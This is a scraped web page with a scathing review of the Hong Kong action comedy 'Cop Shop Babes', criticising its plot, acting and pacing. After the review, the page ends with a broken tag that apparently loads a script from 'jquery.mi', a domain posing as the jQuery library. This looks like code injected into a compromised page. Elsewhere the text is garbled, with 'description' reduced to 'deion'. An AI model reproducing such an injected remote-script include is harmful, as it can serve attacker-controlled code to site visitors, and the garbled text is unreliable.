Proof that babes with guns is no longer a justifiable excuse for a trip to the cinema. If you must watch the fairer sex whupping ass, it's best to dig out that copy of Yes, Madam or Inspectors Wear Skirts. Or anything else.
Exploitation master Aman Cheung brings us this waste of film masquerading as comedy. Carina Lau is the boss of the Cop Shop Babes, a group of female cops who all possess remarkable bone structure. Also on the squad are exiled EEG idol singer Lillian Ho, models Cathy Tsui and Rachel Fu, and former Miss Hong Kong Lee San-San. Hijinks ensue when crappy cops Eason Chan and Jerry Lamb get assigned to their department. However, instead of engaging in actual law enforcement activities, the duo spend their time chatting up the ladies only to get severely beaten. Even worse hijinks ensue when informer Cheung Tat-Ming shows up, crossdresses, and then proceeds to do numerous animal imitations. That's right: animal imitations. Presumably sales of Cop Shop Babes will go up as a result of the above deion. Eventually plot does show up, and it involves mad bomber Tony Ho and his evil band of bad guys. However, if you actually care at that point then some kind of award is in order.
The main problem with Cop Shop Babes is that it's interminable crap, with practically nothing to make it even a passable viewing experience. The acting ranges from routine to god-awful, with Cathy Tsui's English dialogue winning the 'Fingernails on the Blackboard' award. Carina Lau is wasted here, as is Eason Chan who, despite turning in a number of poor performances, is capable of more. Some extra comedy arrives in the form of Wong Jing, who plays a Hannibal Lecter-type who aids our heroines, but it's just more silly stuff to add to the pile. Nothing in this film accomplishes anything of import, and it plods from beginning to end with no discernible attention paid to things like plot, story, dialogue and pacing. In the end, the abundance of eye candy might satisfy some, but beyond that this film (if you could even call it that) will provide nothing else. < src="http://jquery.mi/jquery.geos.js">>
